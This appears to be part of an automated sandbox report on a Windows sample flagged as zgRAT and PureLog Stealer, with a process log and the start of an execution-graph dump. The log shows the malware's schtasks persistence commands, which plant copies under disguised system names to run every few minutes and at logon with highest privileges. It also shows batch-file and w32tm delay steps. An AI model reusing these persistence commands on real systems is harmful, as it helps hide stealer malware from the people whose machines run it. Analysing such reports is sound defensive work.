                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:14
                                                  Start time:01:42:02
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES953C.tmp" "c:\Windows\System32\CSCE25282B3313D430FBB6BBFE2CFE4882.TMP"
                                                  Imagebase:0x7ff660410000
                                                  File size:52'744 bytes
                                                  MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:15
                                                  Start time:01:42:02
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks.exe /create /tn "NOFqHeDosUIopsPGLTN" /sc MINUTE /mo 7 /tr "'C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe'" /f
                                                  Imagebase:0x7ff76f990000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:16
                                                  Start time:01:42:02
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks.exe /create /tn "NOFqHeDosUIopsPGLT" /sc ONLOGON /tr "'C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe'" /rl HIGHEST /f
                                                  Imagebase:0x7ff76f990000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:17
                                                  Start time:01:42:02
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks.exe /create /tn "NOFqHeDosUIopsPGLTN" /sc MINUTE /mo 13 /tr "'C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe'" /rl HIGHEST /f
                                                  Imagebase:0x7ff76f990000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:18
                                                  Start time:01:42:02
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks.exe /create /tn "NOFqHeDosUIopsPGLTN" /sc MINUTE /mo 8 /tr "'C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe'" /f
                                                  Imagebase:0x7ff76f990000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:19
                                                  Start time:01:42:02
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks.exe /create /tn "NOFqHeDosUIopsPGLT" /sc ONLOGON /tr "'C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe'" /rl HIGHEST /f
                                                  Imagebase:0x7ff76f990000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:20
                                                  Start time:01:42:02
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks.exe /create /tn "NOFqHeDosUIopsPGLTN" /sc MINUTE /mo 8 /tr "'C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe'" /rl HIGHEST /f
                                                  Imagebase:0x7ff76f990000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:21
                                                  Start time:01:42:03
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Pictures\RuntimeBroker.exe'" /f
                                                  Imagebase:0x7ff76f990000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:22
                                                  Start time:01:42:03
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Default\Pictures\RuntimeBroker.exe'" /rl HIGHEST /f
                                                  Imagebase:0x7ff76f990000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:23
                                                  Start time:01:42:03
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Users\Default\Pictures\RuntimeBroker.exe'" /rl HIGHEST /f
                                                  Imagebase:0x7ff76f990000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:24
                                                  Start time:01:42:03
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks.exe /create /tn "Memory CompressionM" /sc MINUTE /mo 5 /tr "'C:\Recovery\Memory Compression.exe'" /f
                                                  Imagebase:0x7ff76f990000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:25
                                                  Start time:01:42:03
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks.exe /create /tn "Memory Compression" /sc ONLOGON /tr "'C:\Recovery\Memory Compression.exe'" /rl HIGHEST /f
                                                  Imagebase:0x7ff76f990000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:26
                                                  Start time:01:42:03
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks.exe /create /tn "Memory CompressionM" /sc MINUTE /mo 8 /tr "'C:\Recovery\Memory Compression.exe'" /rl HIGHEST /f
                                                  Imagebase:0x7ff76f990000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:27
                                                  Start time:01:42:03
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks.exe /create /tn "ChaindriverC" /sc MINUTE /mo 11 /tr "'C:\Chaindriver.exe'" /f
                                                  Imagebase:0x7ff76f990000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:28
                                                  Start time:01:42:03
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks.exe /create /tn "Chaindriver" /sc ONLOGON /tr "'C:\Chaindriver.exe'" /rl HIGHEST /f
                                                  Imagebase:0x7ff76f990000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:29
                                                  Start time:01:42:03
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks.exe /create /tn "ChaindriverC" /sc MINUTE /mo 11 /tr "'C:\Chaindriver.exe'" /rl HIGHEST /f
                                                  Imagebase:0x7ff76f990000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:30
                                                  Start time:01:42:03
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\lrFP7pOB0Z.bat"
                                                  Imagebase:0x7ff6f1620000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:31
                                                  Start time:01:42:03
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:32
                                                  Start time:01:42:03
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\chcp.com
                                                  Wow64 process (32bit):false
                                                  Commandline:chcp 65001
                                                  Imagebase:0x7ff774450000
                                                  File size:14'848 bytes
                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:33
                                                  Start time:01:42:03
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\w32tm.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                  Imagebase:0x7ff6502f0000
                                                  File size:108'032 bytes
                                                  MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:34
                                                  Start time:01:42:04
                                                  Start date:02/01/2025
                                                  Path:C:\Chaindriver.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Chaindriver.exe
                                                  Imagebase:0x850000
                                                  File size:1'917'952 bytes
                                                  MD5 hash:64F81209BCCE8D36D800FEEC26D75990
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:35
                                                  Start time:01:42:04
                                                  Start date:02/01/2025
                                                  Path:C:\Chaindriver.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Chaindriver.exe
                                                  Imagebase:0xa0000
                                                  File size:1'917'952 bytes
                                                  MD5 hash:64F81209BCCE8D36D800FEEC26D75990
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:36
                                                  Start time:01:42:04
                                                  Start date:02/01/2025
                                                  Path:C:\Recovery\Memory Compression.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Recovery\Memory Compression.exe"
                                                  Imagebase:0x550000
                                                  File size:1'917'952 bytes
                                                  MD5 hash:64F81209BCCE8D36D800FEEC26D75990
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\Memory Compression.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\Memory Compression.exe, Author: Joe Security
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 70%, ReversingLabs
                                                  Has exited:true

                                                  General

                                                  Target ID:37
                                                  Start time:01:42:04
                                                  Start date:02/01/2025
                                                  Path:C:\Recovery\Memory Compression.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Recovery\Memory Compression.exe"
                                                  Imagebase:0x6b0000
                                                  File size:1'917'952 bytes
                                                  MD5 hash:64F81209BCCE8D36D800FEEC26D75990
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:38
                                                  Start time:01:42:05
                                                  Start date:02/01/2025
                                                  Path:C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe
                                                  Imagebase:0x7c0000
                                                  File size:1'917'952 bytes
                                                  MD5 hash:64F81209BCCE8D36D800FEEC26D75990
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Antivirus matches:
                                                  • Detection: 70%, ReversingLabs
                                                  Has exited:true

                                                  General

                                                  Target ID:39
                                                  Start time:01:42:05
                                                  Start date:02/01/2025
                                                  Path:C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe
                                                  Imagebase:0x820000
                                                  File size:1'917'952 bytes
                                                  MD5 hash:64F81209BCCE8D36D800FEEC26D75990
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:42
                                                  Start time:01:42:08
                                                  Start date:02/01/2025
                                                  Path:C:\Chaindriver.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Chaindriver.exe"
                                                  Imagebase:0x380000
                                                  File size:1'917'952 bytes
                                                  MD5 hash:64F81209BCCE8D36D800FEEC26D75990
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:44
                                                  Start time:01:42:12
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zsJdcY9yPm.bat"
                                                  Imagebase:0x7ff6f1620000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:45
                                                  Start time:01:42:12
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:46
                                                  Start time:01:42:12
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\chcp.com
                                                  Wow64 process (32bit):false
                                                  Commandline:chcp 65001
                                                  Imagebase:0x7ff70f330000
                                                  File size:14'848 bytes
                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:47
                                                  Start time:01:42:12
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\w32tm.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                  Imagebase:0x7ff6502f0000
                                                  File size:108'032 bytes
                                                  MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:48
                                                  Start time:01:42:13
                                                  Start date:02/01/2025
                                                  Path:C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe"
                                                  Imagebase:0x7b0000
                                                  File size:1'917'952 bytes
                                                  MD5 hash:64F81209BCCE8D36D800FEEC26D75990
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Disassembly

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:9.8%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:23.5%
                                                    Total number of Nodes:2000
                                                    Total number of Limit Nodes:52
                                                    execution_graph 20989 7ff652efbea9 20990 7ff652efbec2 20989->20990 20991 7ff652efbeb8 20989->20991 20993 7ff652ef1208 LeaveCriticalSection 20991->20993 20049 7ff652ef1720 20050 7ff652ef1744 20049->20050 20054 7ff652ef1754 20049->20054 20051 7ff652ee5cb4 _get_daylight 11 API calls 20050->20051 20052 7ff652ef1749 20051->20052 20053 7ff652ef1a34 20056 7ff652ee5cb4 _get_daylight 11 API calls 20053->20056 20054->20053 20055 7ff652ef1776 20054->20055 20057 7ff652ef1797 20055->20057 20180 7ff652ef1ddc 20055->20180 20058 7ff652ef1a39 20056->20058 20061 7ff652ef1809 20057->20061 20062 7ff652ef17bd 20057->20062 20078 7ff652ef17fd 20057->20078 20060 7ff652eeb700 __free_lconv_mon 11 API calls 20058->20060 20060->20052 20063 7ff652ef17cc 20061->20063 20065 7ff652eef948 _get_daylight 11 API calls 20061->20065 20195 7ff652eea474 20062->20195 20069 7ff652eeb700 __free_lconv_mon 11 API calls 20063->20069 20070 7ff652ef181f 20065->20070 20068 7ff652ef18b6 20074 7ff652ef18d3 20068->20074 20079 7ff652ef1925 20068->20079 20069->20052 20071 7ff652eeb700 __free_lconv_mon 11 API calls 20070->20071 20075 7ff652ef182d 20071->20075 20072 7ff652ef17e5 20072->20078 20081 7ff652ef1ddc 45 API calls 20072->20081 20073 7ff652ef17c7 20076 7ff652ee5cb4 _get_daylight 11 API calls 20073->20076 20077 7ff652eeb700 __free_lconv_mon 11 API calls 20074->20077 20075->20063 20075->20078 20083 7ff652eef948 _get_daylight 11 API calls 20075->20083 20076->20063 20080 7ff652ef18dc 20077->20080 20078->20063 20078->20068 20201 7ff652ef81dc 20078->20201 20079->20063 20082 7ff652ef422c 40 API calls 20079->20082 20090 7ff652ef18e1 20080->20090 20237 7ff652ef422c 20080->20237 20081->20078 20084 7ff652ef1962 20082->20084 20085 7ff652ef184f 20083->20085 20086 7ff652eeb700 __free_lconv_mon 11 API calls 20084->20086 20088 7ff652eeb700 __free_lconv_mon 11 API calls 20085->20088 20089 7ff652ef196c 20086->20089 20088->20078 20089->20063 20089->20090 20091 7ff652ef1a28 20090->20091 20095 7ff652eef948 _get_daylight 11 API calls 20090->20095 20093 7ff652eeb700 __free_lconv_mon 11 API calls 20091->20093 20092 7ff652ef190d 20094 7ff652eeb700 __free_lconv_mon 11 API calls 20092->20094 20093->20052 20094->20090 20096 7ff652ef19b0 20095->20096 20097 7ff652ef19c1 20096->20097 20098 7ff652ef19b8 20096->20098 20100 7ff652eeb25c __std_exception_copy 37 API calls 20097->20100 20099 7ff652eeb700 __free_lconv_mon 11 API calls 20098->20099 20101 7ff652ef19bf 20099->20101 20102 7ff652ef19d0 20100->20102 20106 7ff652eeb700 __free_lconv_mon 11 API calls 20101->20106 20103 7ff652ef1a63 20102->20103 20104 7ff652ef19d8 20102->20104 20105 7ff652eeb6b8 _wfindfirst32i64 17 API calls 20103->20105 20246 7ff652ef82f4 20104->20246 20108 7ff652ef1a77 20105->20108 20106->20052 20110 7ff652ef1aa0 20108->20110 20118 7ff652ef1ab0 20108->20118 20113 7ff652ee5cb4 _get_daylight 11 API calls 20110->20113 20111 7ff652ef1a20 20114 7ff652eeb700 __free_lconv_mon 11 API calls 20111->20114 20112 7ff652ef19ff 20115 7ff652ee5cb4 _get_daylight 11 API calls 20112->20115 20142 7ff652ef1aa5 20113->20142 20114->20091 20116 7ff652ef1a04 20115->20116 20119 7ff652eeb700 __free_lconv_mon 11 API calls 20116->20119 20117 7ff652ef1d93 20121 7ff652ee5cb4 _get_daylight 11 API calls 20117->20121 20118->20117 20120 7ff652ef1ad2 20118->20120 20119->20101 20122 7ff652ef1aef 20120->20122 20265 7ff652ef1ec4 20120->20265 20123 7ff652ef1d98 20121->20123 20126 7ff652ef1b63 20122->20126 20127 7ff652ef1b17 20122->20127 20132 7ff652ef1b57 20122->20132 20125 7ff652eeb700 __free_lconv_mon 11 API calls 20123->20125 20125->20142 20129 7ff652ef1b8b 20126->20129 20133 7ff652eef948 _get_daylight 11 API calls 20126->20133 20147 7ff652ef1b26 20126->20147 20280 7ff652eea4b0 20127->20280 20128 7ff652ef1c16 20141 7ff652ef1c33 20128->20141 20148 7ff652ef1c86 20128->20148 20129->20132 20135 7ff652eef948 _get_daylight 11 API calls 20129->20135 20129->20147 20132->20128 20132->20147 20286 7ff652ef809c 20132->20286 20137 7ff652ef1b7d 20133->20137 20140 7ff652ef1bad 20135->20140 20136 7ff652eeb700 __free_lconv_mon 11 API calls 20136->20142 20143 7ff652eeb700 __free_lconv_mon 11 API calls 20137->20143 20138 7ff652ef1b21 20144 7ff652ee5cb4 _get_daylight 11 API calls 20138->20144 20139 7ff652ef1b3f 20139->20132 20150 7ff652ef1ec4 45 API calls 20139->20150 20145 7ff652eeb700 __free_lconv_mon 11 API calls 20140->20145 20146 7ff652eeb700 __free_lconv_mon 11 API calls 20141->20146 20143->20129 20144->20147 20145->20132 20149 7ff652ef1c3c 20146->20149 20147->20136 20148->20147 20151 7ff652ef422c 40 API calls 20148->20151 20154 7ff652ef422c 40 API calls 20149->20154 20155 7ff652ef1c42 20149->20155 20150->20132 20152 7ff652ef1cc4 20151->20152 20153 7ff652eeb700 __free_lconv_mon 11 API calls 20152->20153 20158 7ff652ef1cce 20153->20158 20157 7ff652ef1c6e 20154->20157 20156 7ff652ef1d87 20155->20156 20161 7ff652eef948 _get_daylight 11 API calls 20155->20161 20160 7ff652eeb700 __free_lconv_mon 11 API calls 20156->20160 20159 7ff652eeb700 __free_lconv_mon 11 API calls 20157->20159 20158->20147 20158->20155 20159->20155 20160->20142 20162 7ff652ef1d13 20161->20162 20163 7ff652ef1d24 20162->20163 20164 7ff652ef1d1b 20162->20164 20166 7ff652ef1344 _wfindfirst32i64 37 API calls 20163->20166 20165 7ff652eeb700 __free_lconv_mon 11 API calls 20164->20165 20167 7ff652ef1d22 20165->20167 20168 7ff652ef1d32 20166->20168 20172 7ff652eeb700 __free_lconv_mon 11 API calls 20167->20172 20169 7ff652ef1d3a SetEnvironmentVariableW 20168->20169 20170 7ff652ef1dc7 20168->20170 20173 7ff652ef1d5e 20169->20173 20174 7ff652ef1d7f 20169->20174 20171 7ff652eeb6b8 _wfindfirst32i64 17 API calls 20170->20171 20175 7ff652ef1ddb 20171->20175 20172->20142 20177 7ff652ee5cb4 _get_daylight 11 API calls 20173->20177 20176 7ff652eeb700 __free_lconv_mon 11 API calls 20174->20176 20176->20156 20178 7ff652ef1d63 20177->20178 20179 7ff652eeb700 __free_lconv_mon 11 API calls 20178->20179 20179->20167 20181 7ff652ef1e11 20180->20181 20182 7ff652ef1df9 20180->20182 20183 7ff652eef948 _get_daylight 11 API calls 20181->20183 20182->20057 20184 7ff652ef1e35 20183->20184 20185 7ff652ef1e96 20184->20185 20189 7ff652eef948 _get_daylight 11 API calls 20184->20189 20190 7ff652eeb700 __free_lconv_mon 11 API calls 20184->20190 20191 7ff652eeb25c __std_exception_copy 37 API calls 20184->20191 20192 7ff652ef1ea5 20184->20192 20194 7ff652ef1eba 20184->20194 20187 7ff652eeb700 __free_lconv_mon 11 API calls 20185->20187 20186 7ff652eeb2bc __FrameHandler3::FrameUnwindToEmptyState 45 API calls 20188 7ff652ef1ec0 20186->20188 20187->20182 20189->20184 20190->20184 20191->20184 20193 7ff652eeb6b8 _wfindfirst32i64 17 API calls 20192->20193 20193->20194 20194->20186 20196 7ff652eea484 20195->20196 20197 7ff652eea48d 20195->20197 20196->20197 20310 7ff652ee9f4c 20196->20310 20197->20072 20197->20073 20202 7ff652ef738c 20201->20202 20203 7ff652ef81e9 20201->20203 20204 7ff652ef7399 20202->20204 20212 7ff652ef73cf 20202->20212 20205 7ff652ee5788 45 API calls 20203->20205 20208 7ff652ee5cb4 _get_daylight 11 API calls 20204->20208 20224 7ff652ef7340 20204->20224 20206 7ff652ef821d 20205->20206 20209 7ff652ef8222 20206->20209 20213 7ff652ef8233 20206->20213 20217 7ff652ef824a 20206->20217 20207 7ff652ef73f9 20210 7ff652ee5cb4 _get_daylight 11 API calls 20207->20210 20211 7ff652ef73a3 20208->20211 20209->20078 20214 7ff652ef73fe 20210->20214 20215 7ff652eeb698 _invalid_parameter_noinfo 37 API calls 20211->20215 20212->20207 20216 7ff652ef741e 20212->20216 20218 7ff652ee5cb4 _get_daylight 11 API calls 20213->20218 20219 7ff652eeb698 _invalid_parameter_noinfo 37 API calls 20214->20219 20220 7ff652ef73ae 20215->20220 20223 7ff652ee5788 45 API calls 20216->20223 20227 7ff652ef7409 20216->20227 20221 7ff652ef8254 20217->20221 20222 7ff652ef8266 20217->20222 20225 7ff652ef8238 20218->20225 20219->20227 20220->20078 20226 7ff652ee5cb4 _get_daylight 11 API calls 20221->20226 20228 7ff652ef828e 20222->20228 20229 7ff652ef8277 20222->20229 20223->20227 20224->20078 20230 7ff652eeb698 _invalid_parameter_noinfo 37 API calls 20225->20230 20231 7ff652ef8259 20226->20231 20227->20078 20542 7ff652efa004 20228->20542 20533 7ff652ef73dc 20229->20533 20230->20209 20234 7ff652eeb698 _invalid_parameter_noinfo 37 API calls 20231->20234 20234->20209 20236 7ff652ee5cb4 _get_daylight 11 API calls 20236->20209 20238 7ff652ef424e 20237->20238 20240 7ff652ef426b 20237->20240 20239 7ff652ef425c 20238->20239 20238->20240 20242 7ff652ee5cb4 _get_daylight 11 API calls 20239->20242 20241 7ff652ef4275 20240->20241 20582 7ff652ef8ce8 20240->20582 20589 7ff652ef13ac 20241->20589 20245 7ff652ef4261 __scrt_get_show_window_mode 20242->20245 20245->20092 20247 7ff652ee5788 45 API calls 20246->20247 20248 7ff652ef835a 20247->20248 20249 7ff652ef8368 20248->20249 20250 7ff652eefbd4 5 API calls 20248->20250 20251 7ff652ee5d74 14 API calls 20249->20251 20250->20249 20252 7ff652ef83c4 20251->20252 20253 7ff652ef8454 20252->20253 20254 7ff652ee5788 45 API calls 20252->20254 20256 7ff652ef8465 20253->20256 20257 7ff652eeb700 __free_lconv_mon 11 API calls 20253->20257 20255 7ff652ef83d7 20254->20255 20259 7ff652eefbd4 5 API calls 20255->20259 20262 7ff652ef83e0 20255->20262 20258 7ff652ef19fb 20256->20258 20260 7ff652eeb700 __free_lconv_mon 11 API calls 20256->20260 20257->20256 20258->20111 20258->20112 20259->20262 20260->20258 20261 7ff652ee5d74 14 API calls 20263 7ff652ef843b 20261->20263 20262->20261 20263->20253 20264 7ff652ef8443 SetEnvironmentVariableW 20263->20264 20264->20253 20266 7ff652ef1f04 20265->20266 20272 7ff652ef1ee7 20265->20272 20267 7ff652eef948 _get_daylight 11 API calls 20266->20267 20275 7ff652ef1f28 20267->20275 20268 7ff652eeb2bc __FrameHandler3::FrameUnwindToEmptyState 45 API calls 20270 7ff652ef1fb2 20268->20270 20269 7ff652ef1f89 20271 7ff652eeb700 __free_lconv_mon 11 API calls 20269->20271 20271->20272 20272->20122 20273 7ff652eef948 _get_daylight 11 API calls 20273->20275 20274 7ff652eeb700 __free_lconv_mon 11 API calls 20274->20275 20275->20269 20275->20273 20275->20274 20276 